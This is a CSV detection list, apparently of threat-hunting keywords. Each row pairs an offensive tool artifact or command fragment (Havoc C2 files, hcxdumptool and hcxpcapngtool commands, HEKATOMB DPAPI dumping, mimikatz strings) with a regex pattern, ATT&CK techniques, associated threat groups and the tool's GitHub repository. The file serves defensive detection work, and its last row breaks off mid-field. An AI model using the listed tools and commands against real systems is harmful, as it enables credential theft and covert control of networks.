"*Havoc.hpp*",".{0,1000}Havoc\.hpp.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47045"
"*havoc.service*",".{0,1000}havoc\.service.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47046"
"*havoc.yaotl*",".{0,1000}havoc\.yaotl.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47047"
"*Havoc/Client*",".{0,1000}Havoc\/Client.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47048"
"*Havoc/cmd/*",".{0,1000}Havoc\/cmd\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47049"
"*Havoc/payloads*",".{0,1000}Havoc\/payloads.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47050"
"*Havoc/pkg*",".{0,1000}Havoc\/pkg.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47051"
"*Havoc/Teamserver*",".{0,1000}Havoc\/Teamserver.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47052"
"*havoc_agent.py*",".{0,1000}havoc_agent\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47053"
"*havoc_agent_talon.*",".{0,1000}havoc_agent_talon\..{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47054"
"*havoc_default.yaotl*",".{0,1000}havoc_default\.yaotl.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47055"
"*havoc_externalc2*",".{0,1000}havoc_externalc2.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47056"
"*havoc_service_connect*",".{0,1000}havoc_service_connect.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47057"
"*havoc-c2-client*",".{0,1000}havoc\-c2\-client.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47058"
"*havoc-c2-data*",".{0,1000}havoc\-c2\-data.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47059"
"*havocframework.com*",".{0,1000}havocframework\.com.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47060"
"*HavocService*",".{0,1000}HavocService.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47061"
"*HavocTalonInteract*",".{0,1000}HavocTalonInteract.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47062"
"*Havoc-UACBypass.py*",".{0,1000}Havoc\-UACBypass\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","1","N/A","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","47063"
"*HavocUi.cpp*",".{0,1000}HavocUi\.cpp.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47064"
"*HavocUi.h*",".{0,1000}HavocUi\.h.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47065"
"*HavocUI.hpp*",".{0,1000}HavocUI\.hpp.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47066"
"*hccapx2john.py*",".{0,1000}hccapx2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","47067"
"*hci_oracle_passwords*",".{0,1000}hci_oracle_passwords.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","47068"
"*hcxdumptool -i wlan1 -o * --active_beacon --enable_status=1*",".{0,1000}hcxdumptool\s\-i\swlan1\s\-o\s.{0,1000}\s\-\-active_beacon\s\-\-enable_status\=1.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47069"
"*hcxdumptool*",".{0,1000}hcxdumptool.{0,1000}","offensive_tool_keyword","hcxdumptool","Small tool to capture packets from wlan devices. After capturing. upload the uncleaned pcapng here (https://wpa-sec.stanev.org/?submit) to see if your ACCESS POINT or the CLIENT is vulnerable by using common wordlists. Convert the pcapng file to WPA-PBKDF2-PMKID+EAPOL hashline (22000) with hcxpcapngtool (hcxtools) and check if PreSharedKey or PlainMasterKey was transmitted unencrypted","T1040 - T1560 - T1539","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/ZerBea/hcxdumptool","1","1","N/A","N/A","N/A","10","1949","407","2025-04-19T07:25:39Z","2018-02-25T08:18:40Z","47070"
"*hcxhashtool -i *.hashcat --info stdout*",".{0,1000}hcxhashtool\s\-i\s.{0,1000}\.hashcat\s\-\-info\sstdout.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47071"
"*hcxpcapngtool --all -o *.hashcat*",".{0,1000}hcxpcapngtool\s\-\-all\s\-o\s.{0,1000}\.hashcat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47072"
"*hcxpcapngtool -o *.hashcat *.pcapng*",".{0,1000}hcxpcapngtool\s\-o\s.{0,1000}\.hashcat\s.{0,1000}\.pcapng.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47073"
"*hd-launch-cmd *",".{0,1000}hd\-launch\-cmd\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","47074"
"*headers/exploit.h*",".{0,1000}headers\/exploit\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","47075"
"*headers/HandleKatz.h*",".{0,1000}headers\/HandleKatz\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","N/A","10","","N/A","","","","47076"
"*HeapCrypt-main*",".{0,1000}HeapCrypt\-main.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","N/A","9","3","239","44","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z","47078"
"*HeapEncryptDecrypt.cpp*",".{0,1000}HeapEncryptDecrypt\.cpp.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","N/A","9","3","239","44","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z","47079"
"*HeapEncryptDecrypt.exe*",".{0,1000}HeapEncryptDecrypt\.exe.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","N/A","9","3","239","44","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z","47080"
"*HeapEncryptDecrypt.sln*",".{0,1000}HeapEncryptDecrypt\.sln.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","N/A","9","3","239","44","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z","47081"
"*HeapEncryptDecrypt.vcxproj*",".{0,1000}HeapEncryptDecrypt\.vcxproj.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","N/A","9","3","239","44","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z","47082"
"*HEHE - YOU HAVE BEEN PWENED*",".{0,1000}HEHE\s\-\sYOU\sHAVE\sBEEN\sPWENED.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","47083"
"*hekatomb -hashes *",".{0,1000}hekatomb\s\-hashes\s.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","47084"
"*hekatomb-*.tar.gz*",".{0,1000}hekatomb\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","N/A","10","","N/A","","","","47085"
"*hekatomb*-hashes *",".{0,1000}hekatomb.{0,1000}\-hashes\s.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","N/A","10","","N/A","","","","47086"
"*hekatomb-*-py3-none-any.whl*",".{0,1000}hekatomb\-.{0,1000}\-py3\-none\-any\.whl.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","N/A","10","","N/A","","","","47087"
"*hekatomb.ad_ldap*",".{0,1000}hekatomb\.ad_ldap.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","47088"
"*hekatomb@thiefin.fr*",".{0,1000}hekatomb\@thiefin\.fr.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","1","#email","N/A","10","","N/A","","","","47089"
"*hekatomb_dump*",".{0,1000}hekatomb_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","47090"
"*HellHall-main.zip*",".{0,1000}HellHall\-main\.zip.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","1","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","47091"
"*hello %3e c:\\temp\\test.txt*",".{0,1000}hello\s\%3e\sc\:\\\\temp\\\\test\.txt.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","47092"
"*Hello from DCShadow*",".{0,1000}Hello\sfrom\sDCShadow.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - 